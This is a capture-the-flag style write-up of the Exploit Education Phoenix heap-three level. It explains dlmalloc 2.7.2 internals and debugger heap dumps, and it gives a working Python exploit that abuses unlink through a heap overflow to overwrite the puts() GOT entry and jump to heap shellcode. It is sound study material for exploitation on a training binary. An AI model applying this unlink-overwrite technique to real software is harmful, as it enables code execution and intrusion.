This level explores why you should always explicitly initialize your allocated memory, and what can occur when pointer values go stale.
The description and source code can be found here:
http://exploit.education/phoenix/heap-three/
Introduction
NOTE: The diagrams on this page may not look right on a mobile device.
You should view this on a desktop/laptop browser for best readability.
So far, this is the hardest challenge. It requires an in-depth knowledge of how dlmalloc (Doug Lea’s Malloc) operates, specifically, version 2.7.2. It took me a lot of reading (and re-reading) of blog posts & articles to get an understanding. No one source could explain it thoroughly or clearly enough. Even then, it didn’t really click until I started working it out on paper. Just to give you an idea of what I was doing:
I debated for a while on what to do for this post. Because I struggled with understanding this material myself, I thought I might try my hand at explaining everything. But I doubt I’d be successful at that (or at the very least, get some things wrong). Then I thought I might just show the answer and only explain what’s going on with that Python script. The problem with that is if anyone is following along to try to learn, they’d be quite confused as to why the script works. So I’m shooting for something in between. I’ll explain the necessary content to understand how to solve this challenge. But I’ll also leave some links at the end to the references that helped me understand this. These references go in depth more than I will on heap management & how these types of exploits work.
Heap Management
As I said, I’m only going to explain what’s necessary for building an exploit to complete this level. I’ll start by describing how malloc() allocates memory on the heap and the management information it stores there as well. After that, I’ll discuss the free() function, which is what we’ll be exploiting.
malloc()
In case you’re unfamiliar with it, this is what the memory layout looks like for an ELF binary:
Lower Addresses ┌───────────┐ │ Libraries │ ├───────────┤ │ .PLT │ ├───────────┤ │ .TEXT │ ├───────────┤ │ ... │ ├───────────┤ │ .GOT │ ├───────────┤ │ .DATA │ ├───────────┤ │ .BSS │ ├───────────┤ │ ... │ ├───────────┤ │ HEAP │ Heap grows from low to high addresses │ ↓ │ ├───────────┤ │ ... │ ├───────────┤ │ Libraries │ ├───────────┤ │ ... │ ├───────────┤ │ ↑ │ │ Stack │ Stack grows from high to low addresses ├───────────┤ │ ... │ └───────────┘ Higher Addresses
As memory is reserved on the heap from the program by calling malloc(), it will block off a “chunk” of memory:
            Lower Addresses
         ┌── ┌───────────┐
         │   │  Metadata │
         │   ├───────────┤
         │   │  Metadata │
Chunk 1 ─┤   ├───────────┤<== Pointer returned by malloc()
         │   │           │    points to user data section
         │   │ User Data │
         │   │           │
         ├── ├───────────┤
         │   │  Metadata │
         │   ├───────────┤
         │   │  Metadata │
Chunk 2 ─┤   ├───────────┤
         │   │           │
         │   │ User Data │
         │   │           │
         └── └───────────┘
            Higher Addresses
Each allocated chunk of memory contains 3 main sections. The first word (4 bytes) is only used if the previous chunk is free. It’s an integer that indicates the previous chunk’s size. If the previous chunk is allocated, this section can be used for user data in the previous chunk. The next word is another integer that indicates the current chunk’s size. A chunk on the heap is always 8-byte aligned, so the 3 least significant bits will always be 0. For this reason, malloc() will use those to store more metadata. This version (dlmalloc v2.7.2) will use the 2 least significant bits (I believe other implementations will use the 3rd as well). The 2nd bit is the IS_MMAPPED bit and indicates if the current chunk was allocated via mmap. This is not important here so I won’t go into detail, just know that we need to make sure the bit is set to 0. The 1st bit is the PREV_INUSE bit and will indicate if the previous chunk is allocated. These are defined in the source code:
/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use */ #define PREV_INUSE 0x1 /* extract inuse bit of previous chunk */ #define prev_inuse(p) ((p)->size & PREV_INUSE) /* size field is or'ed with IS_MMAPPED if the chunk was obtained with mmap() */ #define IS_MMAPPED 0x2 /* check for mmap()'ed chunk */ #define chunk_is_mmapped(p) ((p)->size & IS_MMAPPED)
The last section is the user data. An allocated chunk will look like this:
         ┌─ ┌───────────┐
         │  │ prev_size │<== Not used while allocated
         │  ├───────┬─┬─┤
         │  │ Size  │M│P│
Chunk 1 ─┤  ├───────┴─┴─┤
         │  │           │
         │  │ User Data │
         │  │           │
         └─ └───────────┘
free()
The free() function will be the focus of the exploit so it’s important that we understand what’s going on with it.
When free() is called (while supplying a pointer to the allocated heap memory), the heap manager adds some metadata to the “user data” section and clears the PREV_INUSE bit of the next chunk. The metadata that’s added is 2 pointers, a forward (FD) and back (BK) pointer to join the freed chunk to one of many doubly-linked lists. These lists are called “bins” and, for performance reasons, there are 5 different types of them; small, large, unsorted, fast, and tcache.
Small/Large/Unsorted Bins
Freed chunks that are less than 512 bytes in size (1024 bytes on x64 systems) are stored in the small bins. Chunks larger than 512 bytes (1024 on x64 systems) are stored in the large bins. Before going into a large or small bin, a freed chunk is first consolidated with neighboring free chunks and put into the unsorted bin. During allocation of memory with malloc(), the unsorted bin list is traversed. If a chunk cannot be used, it’s put into its corresponding small or large bin. Otherwise, the chunk is allocated.
               ┌▸┌───────────┐◂┐ ┌▸┌───────────┐
               │ │ prev_size │ │ │ │ prev_size │
               │ ├───────┬─┬─┤ │ │ ├───────┬─┬─┤
               │ │ Size  │M│P│ │ │ │ Size  │M│P│
┌────────────┐ │ ├───────┴─┴─┤ │ │ ├───────┴─┴─┤
│ Start Ptr. ├─┘ │  FD Ptr.  ├─┼─┘ │  FD Ptr.  │
└────────────┘◂┐ ├───────────┤ │   ├───────────┤
               └─┤  BK Ptr.  │ └───┤  BK Ptr.  │
                 ├───────────┤     ├───────────┤
                 │    ...    │     │    ...    │
                 └───────────┘     └───────────┘
Fast Bins
The fast and tcache bins are additional layers of optimization. Tcache bins are used for multi-threaded processes and are not relevant here. Fast bins are small, recently-released chunks that are not consolidated with their neighbors. They’re meant to be reallocated quickly and are unique in that it uses a singly-linked list instead of a double.
               ┌▸┌───────────┐ ┌▸┌───────────┐
               │ │ prev_size │ │ │ prev_size │
               │ ├───────┬─┬─┤ │ ├───────┬─┬─┤
┌────────────┐ │ │ Size  │M│P│ │ │ Size  │M│P│
│ Fast Bin 4 ├─┘ ├───────┴─┴─┤ │ ├───────┴─┴─┤
└────────────┘   │  FD Ptr.  ├─┘ │  FD Ptr.  │
Chunk Size: 40   ├───────────┤   ├───────────┤
                 │    ...    │   │    ...    │
                 └───────────┘   └───────────┘
This is where the 3 chunks go when they’re freed in the heap-three program. I’ll demonstrate it later.
Source Code
Let’s start by analyzing the source code:
void winner() {
    printf("Level was successfully completed at @ %ld seconds past the Epoch\n",
        time(NULL));
}
int main(int argc, char **argv) {
    char *a, *b, *c;
    a = malloc(32);
    b = malloc(32);
    c = malloc(32);
    strcpy(a, argv[1]);
    strcpy(b, argv[2]);
    strcpy(c, argv[3]);
    free(c);
    free(b);
    free(a);
    printf("dynamite failed?\n");
}
It’s pretty straightforward. The goal is to execute the winner() function and, eventually, your own shellcode. 3 chunks of heap space are allocated, each 32 bytes in size. Data is written to them from user input via the first 3 arguments (and not bounds-checked). Each of those chunks is then freed in reverse order. And finally, a message is printed via printf().
Analysis
Before we dive right into writing an exploit, let’s see what the heap looks like during execution of the program. I’m going to disable the context layout that GEF provides as I won’t need it for this. I’ll set break points after each call to malloc(), after the last call to strcpy(), and after each call to free(). Then I’ll run the program with some simple input for each of the 3 arguments and display the contents of the heap at each breakpoint. I used the vmmap command that GEF provides to see the memory space mapping. The heap is right after the program’s name.
gef> gef config context.layout "" gef> disas main Dump of assembler code for function main: 0x080487fc <+0>: lea ecx,[esp+0x4] 0x08048800 <+4>: and esp,0xfffffff0 ... 0x080488ca <+206>: lea esp,[ecx-0x4] 0x080488cd <+209>: ret End of assembler dump. gef> b *main+30 Breakpoint 1 at 0x804881a gef> b *main+46 Breakpoint 2 at 0x804882a gef> b *main+62 Breakpoint 3 at 0x804883a gef> b *main+134 Breakpoint 4 at 0x8048882 gef> b *main+148 Breakpoint 5 at 0x8048890 gef> b *main+162 Breakpoint 6 at 0x804889e gef> b *main+176 Breakpoint 7 at 0x80488ac gef> run AAAA BBBB CCCC Starting program: /opt/phoenix/i486/heap-three AAAA BBBB CCCC Breakpoint 1, 0x0804881a in main () gef> vmmap Start End Offset Perm Path 0x08048000 0x0804c000 0x00000000 r-x /opt/phoenix/i486/heap-three 0x0804c000 0x0804d000 0x00003000 rwx /opt/phoenix/i486/heap-three 0xf7e69000 0xf7f69000 0x00000000 rwx 0xf7f69000 0xf7f6b000 0x00000000 r-- [vvar] 0xf7f6b000 0xf7f6d000 0x00000000 r-x [vdso] 0xf7f6d000 0xf7ffa000 0x00000000 r-x /opt/phoenix/i486-linux-musl/lib/libc.so 0xf7ffa000 0xf7ffb000 0x0008c000 r-x /opt/phoenix/i486-linux-musl/lib/libc.so 0xf7ffb000 0xf7ffc000 0x0008d000 rwx /opt/phoenix/i486-linux-musl/lib/libc.so 0xf7ffc000 0xf7ffe000 0x00000000 rwx 0xfffdd000 0xffffe000 0x00000000 rwx [stack] gef> x/24wx 0xf7e69000 0xf7e69000: 0x00000000 0x00000029 0x00000000 0x00000000 0xf7e69010: 0x00000000 0x00000000 0x00000000 0x00000000 0xf7e69020: 0x00000000 0x00000000 0x00000000 0x000fffd9 0xf7e69030: 0x00000000 0x00000000 0x00000000 0x00000000 0xf7e69040: 0x00000000 0x00000000 0x00000000 0x00000000 0xf7e69050: 0x00000000 0x00000000 0x00000000 0x00000000 gef> c Continuing. Breakpoint 2, 0x0804882a in main () gef> x/24wx 0xf7e69000 0xf7e69000: 0x00000000 0x00000029 0x00000000 0x00000000 0xf7e69010: 0x00000000 0x00000000 0x00000000 0x00000000 0xf7e69020: 0x00000000 0x00000000 0x00000000 0x00000029 0xf7e69030: 0x00000000 0x00000000 0x00000000 0x00000000 0xf7e69040: 0x00000000 0x00000000 0x00000000 0x00000000 0xf7e69050: 0x00000000 0x000fffb1 0x00000000 0x00000000 gef> c Continuing. Breakpoint 3, 0x0804883a in main () gef> x/24wx 0xf7e69000 0xf7e69000: 0x00000000 0x00000029 0x00000000 0x00000000 0xf7e69010: 0x00000000 0x00000000 0x00000000 0x00000000 0xf7e69020: 0x00000000 0x00000000 0x00000000 0x00000029 0xf7e69030: 0x00000000 0x00000000 0x00000000 0x00000000 0xf7e69040: 0x00000000 0x00000000 0x00000000 0x00000000 0xf7e69050: 0x00000000 0x00000029 0x00000000 0x00000000
As you can see, for each malloc(32) call that’s made, a 0x29 shows up. The program requests 32 bytes of heap space (no alignment is needed here since 32 is already 8-byte aligned), plus 8 bytes for the metadata (prev_size & size fields), plus 1 for setting the PREV_INUSE bit in the size field. 32 + 8 + 1 = 41 = 0x29. After the next breakpoint, the user-supplied data is written to the 3 chunks. Then we see what happens when those chunks are freed.
gef> c Continuing. Breakpoint 4, 0x08048882 in main () gef> x/24wx 0xf7e69000 0xf7e69000: 0x00000000 0x00000029 0x41414141 0x00000000 0xf7e69010: 0x00000000 0x00000000 0x00000000 0x00000000 0xf7e69020: 0x00000000 0x00000000 0x00000000 0x00000029 0xf7e69030: 0x42424242 0x00000000 0x00000000 0x00000000 0xf7e69040: 0x00000000 0x00000000 0x00000000 0x00000000 0xf7e69050: 0x00000000 0x00000029 0x43434343 0x00000000 gef> c Continuing. Breakpoint 5, 0x08048890 in main () gef> x/24wx 0xf7e69000 0xf7e69000: 0x00000000 0x00000029 0x41414141 0x00000000 0xf7e69010: 0x00000000 0x00000000 0x00000000 0x00000000 0xf7e69020: 0x00000000 0x00000000 0x00000000 0x00000029 0xf7e69030: 0x42424242 0x00000000 0x00000000 0x00000000 0xf7e69040: 0x00000000 0x00000000 0x00000000 0x00000000 0xf7e69050: 0x00000000 0x00000029 0x00000000 0x00000000 gef> c Continuing. Breakpoint 6, 0x0804889e in main () gef> x/24wx 0xf7e69000 0xf7e69000: 0x00000000 0x00000029 0x41414141 0x00000000 0xf7e69010: 0x00000000 0x00000000 0x00000000 0x00000000 0xf7e69020: 0x00000000 0x00000000 0x00000000 0x00000029 0xf7e69030: 0xf7e69050 0x00000000 0x00000000 0x00000000 0xf7e69040: 0x00000000 0x00000000 0x00000000 0x00000000 0xf7e69050: 0x00000000 0x00000029 0x00000000 0x00000000 gef> c Continuing. Breakpoint 7, 0x080488ac in main () gef> x/24wx 0xf7e69000 0xf7e69000: 0x00000000 0x00000029 0xf7e69028 0x00000000 0xf7e69010: 0x00000000 0x00000000 0x00000000 0x00000000 0xf7e69020: 0x00000000 0x00000000 0x00000000 0x00000029 0xf7e69030: 0xf7e69050 0x00000000 0x00000000 0x00000000 0xf7e69040: 0x00000000 0x00000000 0x00000000 0x00000000 0xf7e69050: 0x00000000 0x00000029 0x00000000 0x00000000 gef> c Continuing. dynamite failed? [Inferior 1 (process 348) exited normally]
This shows that the freed chunks are in a singly-linked list. The source code shows that bins with a size of 80 bytes or less are put into a fast bin:
/* The maximum fastbin request size we support */ #define MAX_FAST_SIZE 80
After freeing chunk C, you can see that no FD pointer was created as no other chunks exist in the list. When chunk B is freed, you can see a pointer is created (overwriting the first 4 bytes of the user data in chunk B) that points to the start of chunk C. Behind the scenes, the pointer that exists for Fast Bin 4 (chunks of size 40) changed from pointing to chunk C (0xf7e69050) to pointing to chunk B (0xf7e69028). Finally, the same thing occurs when chunk A is freed. Because chunks in the Fast Bins are not consolidated, we won’t be able exploit this. However, since we have the ability to overflow buffers on the heap, we’re able to overwrite metadata in a following chunk. That means, we can set the size to almost anything we want and allows us to prevent the heap manager from putting the chunk into a fast bin.
In a program, free from attacker influence, I’ll show what happens when a chunk is freed. First, let’s look at the relevant source code for when a chunk is freed and needs to be consolidated with the previous chunk (if that one is also free).
/* consolidate backward */
if (!prev_inuse(p)) {
    prevsize = p->prev_size;
    size += prevsize;
    p = chunk_at_offset(p, -((long) prevsize));
    unlink(p, bck, fwd);
}
Specifically, it’s the unlink() macro that we’ll be exploiting:
/* Take a chunk off a bin list */
#define unlink(P, BK, FD) {                                            \
    FD = P->fd;                                                        \
    BK = P->bk;                                                        \
    FD->bk = BK;                                                       \
    BK->fd = FD;                                                       \
}
The reason the heap manager is unlinking the two consolidated chunks from the bin is that this is now a freed chunk of a greater size & will need to be put into the unsorted bin. For this visual, I’ll assume that these chunks are not put into a fast bin (so no single-linked list) and I’ll only show the last byte of the address (for simplicity’s sake). In this scenario, Chunk C is freed and Chunk B is already free. So the heap manager consolidates them and puts the, now, larger free chunk in the unsorted bin.
            Before free(c)         After free(c)
          ┌▸┌───────────┐  ◂──BK──▸┌▸┌───────────┐
          │ │    BIN    ├─┐  0x00  │ │    BIN    ├─┐
          │ ├───────────┤ │        │ ├───────────┤ │
          │ │ fd = 0x20 │ │  0x04  │ │ fd = 0x40 │ │
          │ └───────────┘ │        │ └───────────┘ │
          │               │        │               │
          │ ┌───────────┐ │        │ ┌───────────┐ │
          │ │ prev_size │ │  0x10  │ │ prev_size │ │
          │ ├───────────┤ │        │ ├───────────┤ │
Chunk A   │ │  size=16  │ │  0x14  │ │  size=16  │ │
          │ ├───────────┤ │        │ ├───────────┤ │
          │ │   User    │ │  0x18  │ │   User    │ │
          │ │   Data    │ │  0x1c  │ │   Data    │ │
          │ └───────────┘ │        │ └───────────┘ │
         ┌┼▸┌───────────┐◂┘◂──P───▸│ ┌───────────┐ │ ─┐
         ││ │ prev_size │    0x20  │ │ prev_size │ │  │
         ││ ├───────────┤          │ ├───────────┤ │  │
         ││ │  size=16  │    0x24  │ │  size=32  │ │  │
Chunk B  ││ ├───────────┤          │ ├───────────┤ │  │
         ││ │ fd = 0x40 ├─┐  0x28  │ │  fd ptr.  │ │  │
         ││ ├───────────┤ │        │ ├───────────┤ │  │
         │└─┤ bk = 0x00 │ │  0x2c  │ │  bk ptr.  │ │  │  Will go to
         │  └───────────┘ │        │ └───────────┘ │  ├─ unsorted bin
         │  ┌───────────┐ │        │ ┌───────────┐ │  │
         │  │ prev_size │ │  0x30  │ │ prev_size │ │  │
         │  ├───────────┤ │        │ ├───────────┤ │  │
Chunk C  │  │  size=16  │ │  0x34  │ │  size=16  │ │  │
         │  ├───────────┤ │        │ ├───────────┤ │  │
         │  │   User    │ │  0x38  │ │           │ │  │
         │  │   Data    │ │  0x3c  │ │           │ │  │
         │  └───────────┘ │        │ └───────────┘ │ ─┘
         │  ┌───────────┐◂┘◂──FD──▸│ ┌───────────┐◂┘
         │  │ prev_size │    0x40  │ │ prev_size │
         │  ├───────────┤          │ ├───────────┤
         │  │  size=16  │    0x44  │ │  size=16  │
Chunk D  │  ├───────────┤          │ ├───────────┤
         │  │ fd = 0x?? ├─┐  0x48  │ │ fd = 0x?? ├─┐
         │  ├───────────┤ │        │ ├───────────┤ │
         └──┤ bk = 0x20 │ │  0x4c  └─┤ bk = 0x00 │ │
            └───────────┘ ▾          └───────────┘ ▾
The important thing to understand here is that the value in Chunk B’s forward pointer (P->fd) is written to an offset of the address in Chunk B’s back pointer (P->bk). In this case, it overwrites the Bin’s forward pointer (BK->fd). And the value in Chunk B’s back pointer (P->bk) is written to an offset of the address in Chunk B’s forward pointer (P->fd). In this case, it overwrites Chunk D’s back pointer (FD->bk). That’s all the unlink() macro does.
Exploitation
The idea here is to overwrite Chunk C to make it look like it’s already free. Then, when free(c) is called, we’ll be utilizing a “double-free” exploit. The heap manager calculates the previous chunk’s address (P) by subtracting the “prev_size” field from current chunk’s address. We’ll set Chunk C’s prev_size value to -4 so that the previous chunk’s address (P) will be 4 bytes more. The forward pointer (P->fd) is at an 8 byte offset while the back pointer (P->bk) is at a 12 byte offset.
The exploit’s payload will look like this:
CHUNK A NOP buffer (only 4 bytes) Shellcode CHUNK B Padding (32 bytes) prev_size field (for Chunk C) size field (for Chunk C) Chunk C Padding (4 bytes) Where to write (subtract 12 bytes from target address) What to write (Note: the "where to write" field is written to here+8)
I’ll try to better explain those last 2 lines. The goal here is to overwrite the puts() address in the GOT with the address of the winner() function. That way, when that last string is printed out, it will instead redirect execution. So in Chunk C, after the 4 bytes of padding, I’ll put the GOT address for puts(). This is the P->fd value. However, I’ll need to subtract 12 from that address due to the fact that it’s actually writing to BK->fd and not BK (see the code for the unlink macro) and that offset is +12 bytes.
The last 4 bytes of the payload is the P->bk value and it’s going to be the value I want to write. In this case, I’d like it to be the address of the winner() function. However, life isn’t that simple. Whatever address we use for this, the heap manager will put the P->fd value 8 bytes after it. So if I used the winner() function’s address directly, I’d get a Segmentation Fault as that’s in the .text segment, which is not writable. Instead I’ll use shellcode in the heap to push that address onto the stack, then ret to it.
In an attempt to be more civilized, I decided to write this in Python 3.
#!/usr/bin/env python3
import struct
import sys
PUTS = 0x804c13c - 12 # GOT location for the puts() address
WINNER = 0x080487d5   # Address of the winner() function
RETADDR = 0xf7e69000 + 12  # Address EIP jumps to after calling puts()
# Chunk A
out  = b""
# https://defuse.ca/online-x86-assembler.htm
# push 0x080487d5
# ret
shellcode = b"\x68\xD5\x87\x04\x08\xC3"
out += b"\x90"*4 + shellcode
# Chunk B
out += b" " + b"B"*32 # Starts the next argument for chunk B
out += struct.pack("I", 0xfffffffc) # prev_size
out += struct.pack("I", 0xffffffb0) # size
# Chunk C
out += b" CCCC" # Starts the next argument for chunk C
out += struct.pack("I", PUTS) # P->fd
out += struct.pack("I", RETADDR) # P->bk
sys.stdout.buffer.write(out)
I used an online assembler to generate the shellcode and put it on the heap within Chunk A. I set the size of Chunk C to -80 because the heap manager will check the next chunk to see if it is free (and if so, consolidate). It calculates the next chunk’s address by adding the current chunk’s pointer value to its size. In this case, I’m getting the heap manager to look at Chunk A. It then checks Chunk B for the PREV_INUSE bit. If the bit was cleared, it would attempt to consolidate the current chunk (C) with the next chunk (A).
Final Thoughts
Wow, what a journey. If you, dear reader, are still with me at this point, I’d like to thank you for reading and ask that you leave feedback. I’m sure I can improve my explanations. I’m sure there are errors. Let me know!
If you still don’t “get it,” don’t worry, it took me a long time as well. Check out some of the references below. That reading material should help. In addition, there’s another blog that did a write-up for this same challenge: https://www.lucas-bader.com/ctf/2019/05/02/heap3. There’s a YouTube video (https://www.youtube.com/watch?v=gL45bjQvZSU) that might also help. It’s a “write-up” for the older Protostar Heap Three challenge, but the concept is the same.
References
I strongly recommend reading these articles from Azeria Labs first. It doesn’t go in depth as much as some of the other material, but that’s what makes it easier to learn.
Heap Exploitation – Part 1: Understanding the Glibc Heap Implementation (malloc)
Heap Exploitation – Part 2: Understanding the Glibc Heap Implementation (free, bins, tcache)
Related Phrack articles:
Once upon a free()
Vudo malloc tricks
This description of heap management from Doug Lea is helpful, but not terribly useful for the purposes of solving this challenge:
A Memory Allocator
Other reading material:
Heap overflow using unlink
And of course, the source code for this challenge’s malloc implementation:
ftp://gee.cs.oswego.edu/pub/misc/malloc-2.7.2.c

